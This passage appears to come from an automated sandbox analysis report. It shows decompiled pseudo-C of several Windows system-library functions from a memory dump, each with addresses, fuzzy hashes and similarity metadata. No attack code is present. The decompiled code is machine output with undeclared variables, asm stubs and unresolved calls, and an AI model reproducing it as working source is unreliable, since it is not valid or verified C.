                                                      C-Code - Quality: 80%
                                                      			E049D0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E049CFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E049D1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04949730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E049CA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E049CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x49f8b04 >> 0x14) + (_v44 -  *0x49f8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04927D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E049C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04927D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E049BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x49f8724 & 0x00000008) != 0) {
						E049C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E049D15B5(0x49f8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                      0x049d0eb7
                                                      0x049d0eb9
                                                      0x049d0ec0
                                                      0x049d0ec2
                                                      0x049d0ecd
                                                      0x049d105b
                                                      0x049d105b
                                                      0x049d1061
                                                      0x049d1066
                                                      0x049d1066
                                                      0x049d106b
                                                      0x049d1073
                                                      0x049d1073
                                                      0x049d0ed3
                                                      0x049d0ed6
                                                      0x049d0edc
                                                      0x049d0ee0
                                                      0x049d0ee7
                                                      0x049d0ef0
                                                      0x049d0ef5
                                                      0x049d0efa
                                                      0x049d0efc
                                                      0x049d0efd
                                                      0x049d0f03
                                                      0x049d0f04
                                                      0x049d0f06
                                                      0x049d0f07
                                                      0x049d0f09
                                                      0x049d0f0e
                                                      0x049d0f14
                                                      0x049d0f23
                                                      0x049d0f2d
                                                      0x049d0f34
                                                      0x049d0f34
                                                      0x049d0f14
                                                      0x049d0f52
                                                      0x00000000
                                                      0x00000000
                                                      0x049d0f58
                                                      0x049d0f73
                                                      0x049d0f74
                                                      0x049d0f79
                                                      0x049d0f7d
                                                      0x049d0f80
                                                      0x049d0f86
                                                      0x049d0fab
                                                      0x049d0fb5
                                                      0x049d0fc6
                                                      0x049d0fd1
                                                      0x049d0fe3
                                                      0x049d0fd3
                                                      0x049d0fdc
                                                      0x049d0fdc
                                                      0x049d0feb
                                                      0x049d1009
                                                      0x049d1009
                                                      0x049d1015
                                                      0x049d1027
                                                      0x049d1017
                                                      0x049d1020
                                                      0x049d1020
                                                      0x049d102f
                                                      0x049d103c
                                                      0x049d103c
                                                      0x049d1048
                                                      0x049d1050
                                                      0x049d1050
                                                      0x049d1055
                                                      0x00000000
                                                      0x049d1055
                                                      0x049d0f88
                                                      0x049d0f9e
                                                      0x049d0fa2
                                                      0x049d0fa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049d0fa9
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 48a8982ddb13771462e2a59b187eab44a62e8b26a1e194b7b8adf53336d51ab9
                                                      • Instruction ID: 04218a1735c41adba61d683bb9edba38a9545a6fc0e5f674015702fdd83e6fd4
                                                      • Opcode Fuzzy Hash: 48a8982ddb13771462e2a59b187eab44a62e8b26a1e194b7b8adf53336d51ab9
                                                      • Instruction Fuzzy Hash: B5517B712083429FE324EF28D985B1BB7E9EBC4708F14893DF99697290D670F805CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0493F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04924120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04949830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04949990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E049495D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xc61cd81a
							_t109 = L04924620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000c61c
								E0494F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000c61c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E049495D0();
										L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x0493f0d3
                                                      0x0493f0d9
                                                      0x0493f0e0
                                                      0x0493f0e7
                                                      0x0493f0f2
                                                      0x0493f0f4
                                                      0x0493f0f8
                                                      0x0493f100
                                                      0x0493f108
                                                      0x0493f10d
                                                      0x0493f115
                                                      0x0493f116
                                                      0x0493f11f
                                                      0x0493f123
                                                      0x0493f124
                                                      0x0493f12c
                                                      0x0493f130
                                                      0x0493f134
                                                      0x0493f13d
                                                      0x0493f144
                                                      0x0493f14b
                                                      0x0493f152
                                                      0x0497bab0
                                                      0x0497bab0
                                                      0x0493f158
                                                      0x0493f158
                                                      0x0493f15a
                                                      0x0493f160
                                                      0x0493f165
                                                      0x0493f166
                                                      0x0493f16f
                                                      0x0493f173
                                                      0x0497baa7
                                                      0x0497baa7
                                                      0x0497baab
                                                      0x00000000
                                                      0x0493f179
                                                      0x0493f179
                                                      0x0493f18d
                                                      0x0493f191
                                                      0x0497baa2
                                                      0x00000000
                                                      0x0493f197
                                                      0x0493f19b
                                                      0x0493f1a2
                                                      0x0493f1a9
                                                      0x0493f1af
                                                      0x0493f1b2
                                                      0x0493f1b6
                                                      0x0493f1b9
                                                      0x0493f1c0
                                                      0x0493f1c4
                                                      0x0493f1d8
                                                      0x0493f1df
                                                      0x0493f1e3
                                                      0x0493f1e6
                                                      0x0493f1eb
                                                      0x0493f1ee
                                                      0x0493f1f4
                                                      0x0493f20f
                                                      0x0497bab7
                                                      0x0497babb
                                                      0x0497bacc
                                                      0x0497bad1
                                                      0x0493f215
                                                      0x0493f218
                                                      0x0493f226
                                                      0x0493f22b
                                                      0x00000000
                                                      0x0493f22b
                                                      0x0493f1f6
                                                      0x0493f1f6
                                                      0x0493f1f9
                                                      0x0493f1fb
                                                      0x0493f1fb
                                                      0x0493f1f4
                                                      0x0493f191
                                                      0x0493f173
                                                      0x0493f152
                                                      0x0493f203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: 8c4d294d6d1a79c6579b532bdc50b10615085fa011f08390d9b7a69b583dccec
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: E0517871604710AFD320DF69C840E6BBBF8FF88714F008A2AF99597690E7B4E904CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04983540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E04983540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x49fd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04940BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04983706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0494FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04983540;
						E0494FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0495DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04990C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E049497C0();
					}
					return E0494B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04983971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04983884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0494FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04949650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04983787(_a4,  &_v352, _t80);
						}
					}
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E049495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x04983552
                                                      0x0498355a
                                                      0x0498355d
                                                      0x04983566
                                                      0x04983567
                                                      0x0498357e
                                                      0x0498358f
                                                      0x049835a1
                                                      0x049835a5
                                                      0x0498366b
                                                      0x0498366b
                                                      0x0498366d
                                                      0x04983672
                                                      0x04983679
                                                      0x04983685
                                                      0x0498368d
                                                      0x0498369d
                                                      0x049836a7
                                                      0x049836b8
                                                      0x049836c6
                                                      0x049836c7
                                                      0x049836dc
                                                      0x049836e1
                                                      0x049836e7
                                                      0x049836e9
                                                      0x049836e9
                                                      0x04983703
                                                      0x04983703
                                                      0x049835b5
                                                      0x049835c0
                                                      0x049835c4
                                                      0x00000000
                                                      0x00000000
                                                      0x049835ca
                                                      0x049835d7
                                                      0x049835e2
                                                      0x049835e6
                                                      0x049835e8
                                                      0x049835f5
                                                      0x049835fa
                                                      0x04983603
                                                      0x04983604
                                                      0x04983609
                                                      0x0498360a
                                                      0x04983612
                                                      0x04983613
                                                      0x0498361e
                                                      0x04983622
                                                      0x04983628
                                                      0x0498362f
                                                      0x0498362f
                                                      0x04983636
                                                      0x04983638
                                                      0x0498363b
                                                      0x04983642
                                                      0x04983642
                                                      0x04983636
                                                      0x04983657
                                                      0x04983657
                                                      0x0498365c
                                                      0x04983662
                                                      0x04983669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryHash
                                                      • API String ID: 2994545307-2202222882
                                                      • Opcode ID: 0a3b729d1e0e0e4e292e7e282ac8c2a675f08e9be913404f89be508548dc7fb2
                                                      • Instruction ID: b79f0b6a273e5e03cbe05b9b008f4b180239103698db686516ce2c8069b18d9d
                                                      • Opcode Fuzzy Hash: 0a3b729d1e0e0e4e292e7e282ac8c2a675f08e9be913404f89be508548dc7fb2
                                                      • Instruction Fuzzy Hash: EE4129F1D0152D9FEB21EA54CC85F9EB77C9B84718F0045B9EA09A7140DB31AE888F95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E049D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E049D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04949730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E049CA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E049CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E049D1293(_t79, _v40, E049D07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04927D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E049C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x049d05c5
                                                      0x049d05ca
                                                      0x049d05d3
                                                      0x049d06db
                                                      0x049d06db
                                                      0x049d06dd
                                                      0x049d06e3
                                                      0x049d06e3
                                                      0x049d05dd
                                                      0x049d05e7
                                                      0x049d05f6
                                                      0x049d0600
                                                      0x049d0607
                                                      0x049d0610
                                                      0x049d0615
                                                      0x049d061a
                                                      0x049d061c
                                                      0x049d061e
                                                      0x049d0624
                                                      0x049d0625
                                                      0x049d0627
                                                      0x049d0628
                                                      0x049d0631
                                                      0x049d0640
                                                      0x049d064d
                                                      0x049d0654
                                                      0x049d0654
                                                      0x049d0631
                                                      0x049d066d
                                                      0x049d0674
                                                      0x00000000
                                                      0x00000000
                                                      0x049d0692
                                                      0x049d069e
                                                      0x049d06b0
                                                      0x049d06a0
                                                      0x049d06a9
                                                      0x049d06a9
                                                      0x049d06b8
                                                      0x049d06d6
                                                      0x049d06d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 27ad3b99d0a101820e6944bfc8394ecca7c6a2ebe774b83b00e3f9e5cab5b459
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: C931B332604345ABE720DE25CD45F9B77D9BBC4758F048239F954AB280E670F904CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04983884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E04983884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04949650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04924620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04949650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x04983893
                                                      0x04983896
                                                      0x04983899
                                                      0x0498389f
                                                      0x049838a0
                                                      0x049838a4
                                                      0x049838a9
                                                      0x049838ac
                                                      0x049838ad
                                                      0x049838ae
                                                      0x049838af
                                                      0x049838b1
                                                      0x049838b4
                                                      0x049838bb
                                                      0x049838bc
                                                      0x049838bd
                                                      0x049838c4
                                                      0x049838c8
                                                      0x049838ca
                                                      0x049838ca
                                                      0x049838d5
                                                      0x0498393e
                                                      0x04983940
                                                      0x04983942
                                                      0x04983952
                                                      0x04983954
                                                      0x04983961
                                                      0x04983961
                                                      0x04983967
                                                      0x0498396e
                                                      0x0498396e
                                                      0x04983947
                                                      0x0498394c
                                                      0x00000000
                                                      0x0498394c
                                                      0x049838ea
                                                      0x049838ee
                                                      0x049838f8
                                                      0x049838f9
                                                      0x049838ff
                                                      0x04983900
                                                      0x04983902
                                                      0x04983903
                                                      0x0498390b
                                                      0x0498390f
                                                      0x04983950
                                                      0x00000000
                                                      0x04983950
                                                      0x04983915
                                                      0x0498391d
                                                      0x0498391d
                                                      0x04983922
                                                      0x04983926
                                                      0x00000000
                                                      0x04983928
                                                      0x0498392b
                                                      0x0498392b
                                                      0x04983935
                                                      0x04983937
                                                      0x04983937
                                                      0x00000000
                                                      0x04983935
                                                      0x04983926
                                                      0x049838f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryName
                                                      • API String ID: 2994545307-215506332
                                                      • Opcode ID: 159813a0783bae7c85c436ec6adaffc4ebf99e2146d94569926e36d2d8cfae00
                                                      • Instruction ID: ba8d64b2765431bdedc7a0fd1180e74a80def06ba3f7ae499906b3e3e77a8115
                                                      • Opcode Fuzzy Hash: 159813a0783bae7c85c436ec6adaffc4ebf99e2146d94569926e36d2d8cfae00
                                                      • Instruction Fuzzy Hash: 8C31D472900519EFEB25EE5DC945D6BB778EB80B20F01417DAD15A7650E632BE00CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0493D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04924120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0494B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E049498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E049495D0();
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x0493d29c
                                                      0x0493d2a6
                                                      0x0493d2b1
                                                      0x0493d2b5
                                                      0x0493d2b6
                                                      0x0493d2bc
                                                      0x0493d2bd
                                                      0x0493d2be
                                                      0x0493d2bf
                                                      0x0493d2c2
                                                      0x0493d2c4
                                                      0x0493d2cc
                                                      0x0493d384
                                                      0x0493d34b
                                                      0x0493d34f
                                                      0x0493d350
                                                      0x0493d351
                                                      0x0493d35c
                                                      0x0493d35c
                                                      0x0493d2d6
                                                      0x0493d2da
                                                      0x0493d2e1
                                                      0x0493d361
                                                      0x0493d369
                                                      0x0493d36d
                                                      0x0493d2e3
                                                      0x0493d2e3
                                                      0x0493d2e3
                                                      0x0493d2e5
                                                      0x0493d2ed
                                                      0x0493d2f5
                                                      0x0493d2fa
                                                      0x0493d302
                                                      0x0493d303
                                                      0x0493d30b
                                                      0x0493d30f
                                                      0x0493d313
                                                      0x0493d318
                                                      0x0493d31c
                                                      0x0493d320
                                                      0x0493d379
                                                      0x0493d37d
                                                      0x00000000
                                                      0x00000000
                                                      0x0497affe
                                                      0x0497b001
                                                      0x0497b011
                                                      0x00000000
                                                      0x0493d322
                                                      0x0493d322
                                                      0x0493d330
                                                      0x0493d337
                                                      0x0493d35d
                                                      0x0493d339
                                                      0x0493d33f
                                                      0x0493d38c
                                                      0x0493d38c
                                                      0x0493d33f
                                                      0x0493d349
                                                      0x00000000
                                                      0x0493d349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4621ff35affc289b615c66ddc837cb416e5102523aec307f85691b99527635b8
